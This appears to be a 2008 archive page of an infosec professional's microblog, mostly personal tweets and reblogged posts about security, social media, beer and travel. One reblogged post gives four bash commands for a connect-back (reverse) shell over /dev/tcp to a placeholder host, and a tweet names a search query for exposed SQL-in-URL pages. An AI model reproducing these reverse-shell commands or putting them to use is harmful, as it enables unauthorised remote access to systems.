April 2008
50 posts
07:47 Today, I hope to find a picture to take for a new website. #
11:54 I’d like something similar to what Danchev posts on his blog: synopses of attacks, hosts used, etc. to ID hosts to null-route at our border. #
17:14 Just closed on a refi. Painless and actually pleasurable. If you need a referral for an excellent broker in Mpls, please do ask. #
22:20 A three-fer! House status:...
Stop XSS attacks with SafeHTML →
If you allow user-contributed content in your site, you run into the problem of dealing with user supplied HTML in a safe manner. The most secure way of dealing with things, of course, is to strip…
Mazda creates disassembly line in wake of Cougar... →
Filed under: Plants/Manufacturing, Mazda
If you’ve ever smashed up a car in an accident, you’ve probably had the unpleasant experience of dealing with insurance agents who assess what…
07:47 Today, I hope to find a picture to take for a new website. #
11:54 I’d like something similar to what Danchev posts on his blog: synopses of attacks, hosts used, etc. to ID hosts to null-route at our border. #
17:14 Just closed on a refi. Painless and actually pleasurable. If you need a referral for an excellent broker in Mpls, please do ask. #
22:20 A three-fer! House status:...
Really good tips for writing and blogging
With exception to the “use lists” item, these tips are fantastic. I avoid blogs that incessantly post lists. If I wanted to be cheesy, I’d create a top-ten list of reasons to avoid lists. And this item I’m re-blogging is a list. But still, if you use lists, use them sparingly. Your average reader only has so much patience for random, non-cohesive ideas.
If anything, use a...
09:40 Wishing I could start today with a ride on the motorcycle, but my hands are cold just trying to type! #
17:21 Note to JA-SIG web folk: Not everyone knows who you are. When going to ja-sig.org, you might mention that tidbit. #
22:09 Reading the (ISC)^2 Global Work Force Study. Interesting stuff, that. #
22:31 I *really* don’t think dopplr understands they need to make it easy to...
15:43 Snowing again after a short ride on the moto. Now it’s nap time, then family over for steak kebabs on the grill. #
07:18 My brother is going to apply for the ROTC program at the U of M! #
07:23 (And also Metro State.) It’ll get him home from South Korea, his schooling covered, a degree, and an eventual commission as an officer. Cool #
10:05 Today was the first time in awhile I’ve noticed has cheaper on Friday than Tuesday. $2.42 vs $2.55. #
12:46 I just found out I have to add 5 pages to my...
Virtualization Security - Reading List →
Here’s a reading list of interesting posts in the virtualization+security space. There is a lot of thought going on about how virtualization in the data center affects application security. If you…
09:35 I just uploaded a ton of pictures from my Hawaii/Japan trip in February. www.flickr.com/photos/minntc/ #
12:10 Lunch, then draft language to submit my project for a NASCIO award. www.nascio.org #
15:26 I will be going to Conf. Rm. G this afternoon to chat with my financial planner about [his] information security. I’m looking forward to it! #
15:53 Cube decoration:...
09:07 NWA reports $191m loss. Delta reports $6.4b loss. Who should be buying who? #
15:40 I’m off to pick up my moto and ride into the sunset. Or maybe to North Minneapolis; I’m not sure yet. #
17:18 I’m off to the MIMA gathering. #
16:10 In a preso on NAC. Presenter got Impulse SafeConnect for 1000 users for 2/3rds what Cisco wants for 250 users; installed & running in a day. #
16:18 $20k investment to blanket the campus, wired and wireless, in a day, with full vendor support. Cisco would be 2-3 times that. #
09:34 I’ve received about 10 “LAST FINAL NOTICE” messages from GoDaddy that something is expired. It would be nice if I could tell them I know. #
12:35 I think I’ll go ride bikes. #
AHHHH! →
AHHHH! canada r attacking!
we must attack back!!1!!
picture: dunno source, via our lolcat builder. lol caption: happehsockz
» Recaption This
…
08:32 OH: I gave that one up long ago when they kept changing names more than some truck drivers changed shirts. (On tracking MnSCU .edu domains.) #
13:00 Up to the ‘rents to sheetrock Mom’s art shack. Adios, Twitterland. #
09:34 Compiling a list of the domains in our organization, then looking for a way to monitor for suspect content to notify site administrators. #
12:33 Confused about how Google ranks the results for a search of my name…only two are homepages and not near top, rest are social net profiles. #
15:13 My iPod is firing on all cylinders for a rainy-day playlist. Ani, Ibrahim Ferrer, an...
“If you’re not prepared to be wrong, you’ll never come up with...”
– Sir Ken Robinson
00:37 Was fighting with Yahoo! Pipes to try and find a cleaner, leaner, meaner way to combine tweets into daily digests accessible via RSS. Sleep. #
14:47 Pulling Twitter feeds off my Tumblr page until I can figure out a better RSS tweet digest solution that actually captures all my tweets. #
15:50 Tres cool animation of This American Life tinyurl.com/39komh #
17:21 Time to retire to...
Connect-back shell in four lines
From this blog post, you can create a connect-back shell with four BASH commands:
$ exec 0/tcp/hostname/port # First we copy our connection over stdin
$ exec 1>&0 # Next we copy stdin to stdout
$ exec 2>&0 # And finally stdin to stderr
$ exec /bin/sh 0/tcp/hostname/port 1>&0 2>&0
Oh, and you can do that without root/wheel access.
7:36: @GraemeThickins I mean, if advertisers need consultants to sort out the ad networks, how is that arena accessible to a small business?
8:10: This is a great write-up on the Storm worm: http://tinyurl.com/678oyz
9:21: @flyspy The blackboxes are pretty cool. Toured one at St. Thomas last summer. Shipable, drive-up data center just needs water & power conns.
9:23: @sborsch You could open...
09:10 This is a great write-up on the Storm worm: tinyurl.com/678oyz #
12:43 What fun! Go Google “allinurl: select from where in order” then shake your head in dismay that SQL queries are passed from the URL requested #
12:58 Retweet: You must have missed this. tinyurl.com/4ycfdj #
16:54 Off to Spill The Wine, then A Midsummer Night’s Dream at the Guthrie. #
jth @rmsylte You just use the replicators for that. “Tea; Earl Grey; Hot.” writeRelativeTimestamp(1208293698);at 09:08 PM GMT from twitterrific
@swirlspice @jojeda You can also config gmail to “send as” your other accounts. writeRelativeTimestamp(1208293554);at 09:05 PM GMT from twitterrific
jojeda: From my tech blog: Video, print: Wii, Sarah,...
22:29 Also, ate a 1,000 year-old egg. Duck egg cured in lye. Not bad! #
06:47 Note to Twitter: Two-click interface to block, then dumping me back to main page = bad. One-click interface to block & don’t move me = good. #
08:21 Hi ho, hi ho, off to work I go. Campus assessment today, let’s see how these folks fare in the infosec arena. #
16:07 Time to ride the motorcycle! #
16:37 Very interesting article on privacy. From 1967. tinyurl.com/64zvs9...
A Scary Web 2.0 Bedtime Story →
What would you do if your Google account disappeared five minutes ago. Or Yahoo! for those of you with aversion to GOOG. Or the 18 MSN-tied people left out there. Scary thoughts.
jth Off to rack my beer into the secondary fermenter, then go clean the kitchen. Woo-hoo. writeRelativeTimestamp(1208115455);at 07:37 PM GMT from twitterrific
@garrickvanburen Possibly…that’s not far off from black-market current valuation for your identity information. At least name+SSN. writeRelativeTimestamp(1208098260);at 02:51 PM GMT from twitterrific
...
CO2 captured to feed biodiesel-producing algae →
Filed under: Biodiesel, Emerging Technologies, Carbon Capture
Two companies, Holcim and Aurantia are starting a new project to reuse CO2. They take the CO2 produced by a cement…
08:37 I’m definitely not sold on friendfeed. I signed up for another social network aggregator that did a better job of filling in gaps. #
08:40 …I just wish I could remember the damn URL for that site! #
09:43 New blag post where I explore why I bother with Twitter and blags. john.hoffoss.com/post/31636015 #
14:37 Off to rack my beer into the secondary fermenter, then go clean...
Why do I Twitter?
I’ve got a few friends that, once aware of how many different social sites I’ve got accounts on, wonder how on Earth I have time to keep that up and why I bother. This goes for Flickr, Facebook, LinkedIn, Google [Talk|Reader|Mail|etc], Tumblr (thank you for reading!) and [especially] Twitter. I’ve never come up with a good response, so I thought I’d try to take a stab at...
09:06 Don’t hurt the psychic clone babies! tinyurl.com/6xdabo #
09:33 DIY Steampunk Male Enhancement: vimeo.com/860821 #
07:25 Google Analytics code to track link-clicks on files/external sites does not work with my personal site on Google Pages. Frustrating. #
07:46 Leaving now for the Social Media Brekkie. I hope the roads are alright. #
07:58 The roads in Minneapolis are wet, but not bad. Can I just say roseville is a PITA to get to. #
08:25 Fail 1: drove to Dunn bros before realizing brekkie is at...
Sumday u will save lotsa ppl, meet sum robotz, an... →
Sumday u will save lotsa ppl, meet sum robotz, an den become a doosh.
luke, eye iz ur fathur.
picture: secret. lol caption: dmf15
» Recaption This
08:24 MPR Future Tense today: potential for hardware back doors/vulnerabilities baked into hardware by manufacturers. Interesting attack model. #
08:54 Michael Arrington: The guy you call if you need a quote from an extremist point of view from a reputable site. #
09:43 To-do list: long. Time in day: short. Must get busy! #
15:51 Looking for Twitterers in other industries and surprised how...
Ethanol debate combusts →
Can alternative energy save lives? Stanford University prof Mark Jacobson says yes — except in one case: ethanol. His research, recently presented at the University of Minnesota, suggests…
06:26 Off to the office. Hopefully remote printing worked. Then to Fergus Falls, then back home. Six hours on the road for a two hour meeting :( #
06:47 TPT is doing a show for MAKE Magazine! #
17:29 I need to brew more beer. I’ve given away or drunk over half of my first batch already! #
18:50 Precursor to Chuck Norris/Bruce Schneier Facts? You decide....
10:34 Hey #sectwits, what has worked for your organization to train your IT staff and admins to be more aware of IT security and “best-practices”? #
10:46 For all you security twits, I’ve posted some brief thoughts on protocol security tweet [ john.hoffoss.com/post/31043219 ] #sectwits #
14:25 MN Senate banning “ticket-grabbing” (ticket sniping) software on the...
#hashtags for Security Twits
Over the course of two months, Jennifer Legio (mediaphyter) has amassed a list of around 80 Information Security twitterers here on her blog. This list will grow during and after RSA, I’m betting.
While this group of folk is more interesting than your average industrial grouping of folk, there’s a lot of chatter that can make it tough for new followers to see the value in the...
18:38 A great idea for those of you who are in a relationship and like eating: john.hoffoss.com/post/30978927 #
21:08 Watching “Once” with wifey. Very good so far. I am #notatrsa as well. #
22:15 Just finished watching “Once”. Buying Glen Hansard & Marketa Irglova’s “The Swell Season” tomorrow. #
4 tags
Asakusa!
I just upped a few shots from our day in Asakusa, Tokyo, Japan. I’ve got lots more to churn through, but this is a short set to test out my workflow. Problems already identified: screwed up tagging/descriptions that didn’t stick when I reordered my pictures. Sorry to those reading on RSS readers, that won’t happen again.
The Anniversary Tradition
Wifey and I met [on a blind-date] on the third of the month. We married on the third, which also happened to be Labor Day. I only messed up in not proposing on the third. Ever since we celebrated our first month, (a cheesy event, as these are wont to be) we decided to try a new restaurant that neither of us had visited before. Every month since, on or around the third, we go-a-hunting for a new...
10:14 Breakfast today: Three egg omelets, organic/naturally raised bacon, sprouted rye with blueberry marmalade. Also wow. #
10:15 On the docket for today: 3 mile walk, clean house (boo), 20-30 mile bike ride (yay), hearts & drinks with wife’s girlfriends (yay). #
18:01 Just buzzed my hair. #3 is the one for me. #
13:17 Working on aggregating data from the past year of assessments at about 35 colleges & universities. Lots of possibilities but no inspiration. #
14:14 Got my Google Reader unread items count to 255…lowest it’s been in a long while. Cut about 20% of feeds I didn’t read. #
16:10 I am really looking forward to Sigma’s 30mm f/1.4 for Nikon cameras. #
17:58...
12:10 Toying with the idea of providing some niche consulting on the side. #
13:11 I’ve just added comments to my Tumblr log via Disqus. It then pulls RSS from my LJ, which include Tweets posted daily via LoudTwitter. Ugh. #
16:43 Anyone considering attending the New Media Showcase tomorrow? (www.inms.umn.edu/digerati/) #
Well, this will be interesting.
I’ve just revised the way my site here is set up. We’ll see how this goes.
I just hacked in comments to my Tumblr account using Disqus! I’ve also stopped pulling my Twitter RSS feed directly to Tumblr. I’m now using LoudTwitter to post my Twits for each day to my LiveJournal. Tumblr (this site) will then pull the RSS feed of my LiveJournal blog, which will include those...
How do you increase the level of security in an org with 20,000 staff, 1,000 in IT (maybe), where least privilege is a foreign concept.
Create a high-level security program, awareness training, security assessments. What else?
There’s a big proposed update to FERPA (higher ed data privacy). Reviewing now to determine impact of those changes.
I am always perplexed when a discussion of security best practices is met with resistance from system and network administrators.